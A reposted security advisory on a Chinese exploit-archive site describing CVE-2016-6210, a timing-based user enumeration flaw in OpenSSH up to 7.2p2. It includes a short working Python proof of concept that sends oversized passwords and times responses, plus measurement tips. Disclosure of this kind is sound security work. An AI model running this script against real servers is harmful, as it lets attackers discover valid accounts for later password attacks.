首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 OpenSSHD <= 7.2p2 - User Enumeration 来源：vfocus.net 作者：Harari 发布时间：2016-07-19   Source: http://seclists.org/fulldisclosure/2016/Jul/51   -------------------------------------------------------------------- User Enumeration using Open SSHD (<=Latest version). -------------------------------------------------------------------   Abstract: ----------- By sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most modern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.   CVE-ID --------- CVE-2016-6210   Tested versions -------------------- This issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well).   Fix ----------------- This issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet). (thanks  to  'dtucker () zip com au' for his quick reply and fix suggestion).   Details ---------------- When SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD source code. On this hard coded  password  structure  the password hash is based on BLOWFISH ($2) algorithm. If real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB)  will result in shorter response time from the server for non-existing users.   Sample code: ---------------- import paramiko import time user=raw_input("user: ") p='A'*25000 ssh = paramiko.SSHClient() starttime=time.clock() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try:         ssh.connect('127.0.0.1', username=user,         password=p) except:         endtime=time.clock() total=endtime-starttime print(total)   (Valid users will result in higher total time).   *** please note that if SSHD configuration prohibits root login , then root is not considered as valid user...   *** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP packets of the server, since this will eliminate any network delays on the way.   Eddie Harari   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Axis Communications MPQT/PACS ·vBulletin 5.x/4.x - Persistent ·OpenBSD 5.9 kernel panic throu ·vBulletin 4.x - SQLi in breadc ·OpenBSD 5.9 kernel panic throu ·DropBearSSHD <= 2015.71 - Comm ·OpenBSD 5.9 kernel panic in UF ·Meinberg NTP Time Server ELX80 ·OpenBSD 5.9 kernel panic in tm ·Drupal RESTWS Module 7.x - Rem ·OpenBSD 5.9 kernel panic throu ·Wowza Streaming Engine 4.5.0 C   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved